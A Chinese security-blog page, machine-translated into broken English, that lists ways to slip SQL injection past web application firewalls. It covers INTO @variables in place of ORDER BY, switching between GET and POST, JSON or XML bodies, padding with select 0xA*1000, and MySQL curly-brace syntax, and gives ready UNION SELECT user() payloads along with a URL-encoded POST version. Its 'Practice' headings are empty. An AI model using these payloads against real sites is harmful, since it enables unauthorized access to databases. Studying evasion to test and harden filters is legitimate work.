当前位置:网站首页>SQL injection bypass (V)
SQL injection bypass (V)
2022-06-28 02:29:00 【A τθ】
One 、order by Bypass
When order by When filtered , Unable to guess the number of fields , You can use into Replace variable names .
select * from users where id=1 into @a,@b,@c,@d;

Two 、http The same parameter request bypasses
1、 Principle analysis
waf When detecting dangerous characters , Respectively post Request and get The request sets different matching rules , The request was intercepted , Changing the request mode has a chance to bypass the detection .
If the program can receive get、post, If waf Only right get Match interception , No, right post To intercept .
<?php
echo $_REQUEST['id'];
?>
There are some waf As long as there is a GET perhaps POST, Priority matching POST, This leads to being bypassed .
2、 Practice



3、 ... and 、application/json perhaps text/xml Bypass
1、 Principle analysis
Some programs are json Submit parameters , The procedure is also json receive , And then spliced to SQL perform .
json The format is usually not intercepted . So you can bypass waf.
text/xml Will not be intercepted .

Four 、 Run a large number of character bypasses
1、 Principle analysis + Practice
have access to select 0xA Run some characters from around to break through some waf Intercept .
id=1 and (select 1) and (select 0xA*1000) union select 1,user()-- &submit=1
post code :
id%3d1+and+(select+1)+and+(select+0xA*1000)+union+select+1,user()--+%26submit%3d1


5、 ... and 、 Flower expansion bypasses
1、 Principle analysis
select 1,2 union select{
x 1},user();
To the left of the curly bracket is the content of the comment , This can help some waf Interception of .
2、 Practice
select * from users where id=1 union select {
xxx 1},{
yyy 2},{
zzz 3},user();

边栏推荐
- Cesium Click to obtain longitude and latitude (2D coordinates)
- [Yocto RM] 2 - Yocto Project Terms
- [Yocto RM]8 - OpenEmbedded Kickstart (.wks) Reference
- [Yocto RM]1 - System Requirements
- To understand what is synchronous, asynchronous, serial, parallel, concurrent, process, thread, and coroutine
- KVM相关
- Adding text labels to cesium polygons the problem of polygon center point offset is solved
- Four classic training modes in comparative learning
- SQL injection bypass (3)
- The interviewer asked: this point of JS
猜你喜欢

766. toplitz matrix

SQL 注入绕过(三)

后勤事务繁杂低效?三步骤解决企业行政管理难题

Wangxinling, tanweiwei Shanhai (extended version of Chorus) online audition lossless FLAC Download

Protocole de transfert de fichiers - - FTP

Intranet penetration with FRP

Appium自动化测试基础— 补充:App的包名(appPackage)和启动名(appActivity)

Machine learning (x) reinforcement learning

Jenkins - built in variable access

CVPR22收录论文|基于标签关系树的层级残差多粒度分类网络
随机推荐
类的初始化与回调的用法
Appium自动化测试基础— 补充:App的包名(appPackage)和启动名(appActivity)
匿名挂载&具名挂载
指南针股票开户是会有什么风险吗?指南针开户安全吗
205. isomorphic string
[Yocto RM]3 - Yocto Project Releases and the Stable Release Process
【sylixos】NEW_1 型字符驱动示例
技术人员如何成为技术领域专家
Hi, you have a code review strategy to check!
Ten MySQL locks, one article will give you full analysis
Jenkins - data sharing and transfer between copy artifact plug-in builds
Learn pickle
The interviewer asked: can you simulate the new operator of JS
geojson 格式說明(格式詳解)
Machine learning (x) reinforcement learning
Fundamentals of scala (3): operators and process control
JS random number (random number decimal)
Cesium Click to obtain longitude and latitude (2D coordinates)
CVPR22收录论文|基于标签关系树的层级残差多粒度分类网络
Differences between cesium polygon extrudedheight and height